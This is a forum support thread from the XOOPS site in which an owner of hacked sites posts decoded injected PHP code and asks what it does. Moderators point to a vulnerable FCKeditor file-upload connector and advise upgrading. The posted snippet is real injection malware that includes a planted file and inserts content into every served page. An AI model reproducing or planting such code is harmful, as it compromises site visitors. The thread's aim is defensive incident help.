1
fosterm
Sites Hacked .. Need some help please
  • 2008/9/29 23:45

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Hi all

Recently one of my sites which is still running 2.2.5 was hacked. Each php file had encrypted code added at the top of the file.
Every php file on my account was infected. The encrypted code was decoded by my provider and is as follows
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/*****/public_html/modules/content/admin/fckeditor/editor/filemanager/browser/default/images/icons/32/copper.php')){include_once('/home/*****/public_html/modules/content/admin/fckeditor/editor/filemanager/browser/default/images/icons/32/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/<body/si',$c)){return preg_replace('/(<body[^>]*>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}


My provider stated, "We checked the issue and we could see that the codes are added to use the default editor of XOOPS software that you are using."

Can anyone tell me what the added code does?

Just today another site which is running XOOPS 2.0.16 and OpenX was hacked. The hack added an encrypted code to the start of every php file in the following directories,
root, Cache, OpenX, CPG and Frameworks.

Can anyone direct me to a solution to stop this behavior? Is it true that the editor from even XOOPS 2.0.16 can be used to inject this kind of code into php files?

What procedures do I need to perform to troubleshoot and or prevent this issue?

Both sites are running on the same shared server. File permissions on the changed files were set to 755 and 644. Mainfile.php was not altered due to it being set to 444 I assume.

If I left out anything necessary to understand the situation please ask me to provide it.


Thanks for the help
Foz

2
Mamba
Re: Sites Hacked .. Need some help please
  • 2008/9/30 0:41

  • Mamba

  • Moderator

  • Posts: 11251

  • Since: 2004/4/23


If I remember correctly, older versions of fckeditor had a security risk.
I don't have a link right now, but you should updated to a newer version, or update your whole system to XOOPS 2.3.
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

3
ghia
Re: Sites Hacked .. Need some help please
  • 2008/9/30 9:24

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


First, you should not publicize hacking scripts!

Quote:

fosterm wrote:
My provider stated, "We checked the issue and we could see that the codes are added to use the default editor of XOOPS software that you are using."
Did he have additional data to support this claim? Or is he just jumping conclusions by seeing editor and default in the file path from the XOOPS part of your site in the decoded hack? BTW is FCKeditor your default XOOPS editor?

The referred file copper.php is a file that doesn't belong in the directory and is no part of the editor.
It has been induced there as part of the initial attack. Finding out how it came there will you learn more over the attack vector. All what is recently going on may be part of expoiting the hack.
Quote:
Can anyone tell me what the added code does?
That would be difficult without knowing what the copper.php file contains.

Quote:
Can anyone decode the above code and tell me what purpose it serves?
It contains the same, but tailored to the other site.
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/xxx/public_html/openx_backup1/lib/xmlrpc/java/ApacheLib2/org/openads/proxy/copper.php')){include_once('/home/xxx/public_html/openx_backup1/lib/xmlrpc/java/ApacheLib2/org/openads/proxy/copper.php');
...

As you see in the file path a directory in your OpenX was used. You are running also other softwares as OpenX on your site(s), which can mean that your site(s) may contain other vulnerabilities than in the XOOPS system alone, which is relativly secure (or can be made to).

(I hope OpenX is not to open! (Sorry, couldn't resist!))
Quote:
Can anyone direct me to a solution to stop this behavior? Is it true that the editor from even XOOPS 2.0.16 can be used to inject this kind of code into php files?

Known attack vectors for XOOPS are the older Spaw editor and the contuedo module. To say more, you must make a list of all your installed XOOPS items (modules, frameworks, editors, ...) with their versions (see all xoops_version.php).
Quote:
What procedures do I need to perform to troubleshoot and or prevent this issue?
There are already a lot of threads with sound advice for the XOOPS part of your site. For the other parts, you should seek help on the support fora of the respective softwares such as from OpenX.
Quote:

Mamba wrote:
If I remember correctly, older versions of fckeditor had a security risk.
I don't believe that applies to his versions.

4
fosterm
Re: Sites Hacked .. Need some help please
  • 2008/9/30 20:05

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Hi Ghia_

Thank you for the detailed reply.


I did not ask my provider to provide support for his XOOPS editor entrance theory. Being a novice at this it never crossed my mind, but you are right , that question should be asked.

Using one of the links you posted, I changed my default XOOPS editor to tinyMCE instead of the XOOPS default. I assume it was originally FCK since I have never messed with the editors.

Unfortunately I had already restored the compromised files by the time I read your post asking what the copper.php file does. If this happens again I will make sure to follow up on that lead.

I did a cursory look at the OpenX site and did not find anything related to this hack..will continue to look.

Modules I am running on the 2.0.16 version are as follows:

WFDownload 3.2
pages 1.16
ads 3
Smartsection 2.13
Smartfaq 1.08
Liaise 1.26
Content 0.5
XHLD 3.07
Google Maps 0.83
Wordpress 2.05
protector 3.04
cbb 3.08
Xoops Tag 0.92
Smartclone 1
Happy Search 0.53
Happy Linux 1.4
Frameworks 1.22


Thanks Foz

5
ghia
Re: Sites Hacked .. Need some help please
  • 2008/9/30 20:15

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


Apart from the obvious updates for XOOPS and Protector, there is at first view nothing wrong with your module list.

Are you aware of this?
Quote:

openX wrote:
# Allow PHP code in ads to be executed: While it is possible to allow execution of PHP code in ads it should be noted that this represents a security risk.

6
fosterm
Re: Sites Hacked .. Need some help please
  • 2008/9/30 22:49

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


I do not have "Allow PHP code in ads to be executed" enabled in my OpenX installation.

I found someone else with the exact issue running different software that uses similar editors.

http://www.tinyportal.net/index.php?topic=26106.0;all

I am still a bit confused. If the exploit is in FCK and I make another editor my default editor (tinymce) will that prevent the exploit through FCK?

Also from the link above it looks like tinymce may have a problem also?

Thanks again for all the help.

Foz

7
ghia
Re: Sites Hacked .. Need some help please
  • 2008/10/1 0:38

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


Quote:
I am still a bit confused. If the exploit is in FCK and I make another editor my default editor (tinymce) will that prevent the exploit through FCK?

No, if you use the editor or not makes no difference. as long as the files are on your system you are vulnerable.

The exploit uses the connectors. I don't know what the exact purpose is, but it seems you could upload files with it.
In the by the hackers used file config.php the following is stated:
// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
$Config['Enabled'] = true ;

Unfortunatly, in the editor distributed with XOOPS this was set to true as displayed above. I believe in the new 2.3.0 it is set to false.
I believe you might be safe if you upgrade FCKeditor to the latest version or set the setting to false.

As stated by tinyportal.net:
Quote:
As to the exploit, I think it's because either Tinyportal or SMF is running an outdated version of the FCKeditor which is version 2.3.2 Build 1082. The current version is Version 2.6.3 and has "Important security fixes have been applied to the File Manager, Uploader and Connectors. Upgrade is highly recommended.".

The version of FCKeditor incorporated in 2.3.0 has to be checked if it complies with the latest official version.

If you are in doubt, remove the complete FCKeditor (all files in all (sub)directories)!

Quote:
Also from the link above it looks like tinymce may have a problem also?
It might if it is an older version. I have asked the author to specify the affected version.

8
ernestfran
Re: Sites Hacked .. Need some help please
  • 2011/7/31 21:14

  • ernestfran

  • Just popping in

  • Posts: 2

  • Since: 2011/7/31


Hey, I was thinking the same as gaia, the least thing you wanna do is post what got hacked! Something similar had happened to me also with an old version from 2008 and I almost commited the same mistake as this.

As the guys mentioned the best thing to do is to look for updates and patch it ASAP!
The best way to predict the future is to invent it. I'm currently working on a Uni project on klonopin side effects for my pharmacology course. Please feel free to PM me if you've got any ideas you can assist with

Login

Who's Online

71 user(s) are online (38 user(s) are browsing Support Forums)


Members: 0


Guests: 71


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Jul 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits